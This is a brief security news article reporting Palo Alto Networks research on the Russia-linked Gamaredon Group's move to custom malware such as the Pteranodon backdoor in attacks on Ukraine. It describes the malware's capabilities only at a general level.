An attack group with links to Russia has elevated from off the rack malware to a more customized approach focusing on attacks of the Ukraine, researchers said.
The Gamaredon Group has been active since at least mid-2013, but its activities were first detailed in April 2015 by LookingGlass, when it first looked at Operation Armageddon, said researchers at Palo Alto Networks.
Ukraine Attack: An Insider’s Perspective
Latest Ukraine Power Outage a Hack
Power Out in Ukraine, Cause Unclear
PSUG: Designing a Security Program
Gamaredon has started using new, custom-built malware instead of the widely available RATs, said researchers at Palo Alto Networks.
The new pieces of malware used by the group are capable of downloading and executing additional payloads, scanning infected systems for specific files, capturing screenshots, and executing remote commands. While the older tools were easy to identify with antimalware products, its new creations often go undetected or unrecognized.
“We believe this is likely due to the modular nature of the malware, the malware’s heavy use of batch scripts, and the abuse of legitimate applications and tools (such as wget) for malicious purposes,” Palo Alto Networks researchers said in a blog post.
One of the custom backdoors used by Gamaredon is Pteranodon, which can capture screenshots, download and execute files, and execute commands on the system.
While Gamaredon has started using new malware, it still relies on self-extracting archives (SFX) and much of the same infrastructure as when its activities were first analyzed.
Russia-linked threat groups have been blamed for several campaigns targeting Ukraine remains a target of attacks and just sustained a cyber-induced outage in the country’s energy sector.